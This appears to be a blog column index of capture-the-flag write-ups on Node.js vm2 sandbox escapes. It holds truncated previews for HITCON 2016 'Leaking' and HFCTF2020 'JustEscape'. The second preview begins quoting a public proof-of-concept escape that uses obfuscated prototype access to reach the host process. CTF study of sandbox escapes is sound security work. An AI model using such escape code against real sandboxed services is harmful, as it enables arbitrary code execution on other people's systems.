沙箱逃逸
关注
分享
扫一扫
fmyyy1
最废物的web手
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
[HITCON 2016]Leaking
"use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { res.he原创 2021-05-25 20:31:26 · 414 阅读 · 1 评论 -
[HFCTF2020]JustEscape
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(原创 2021-04-13 14:26:58 · 1280 阅读 · 2 评论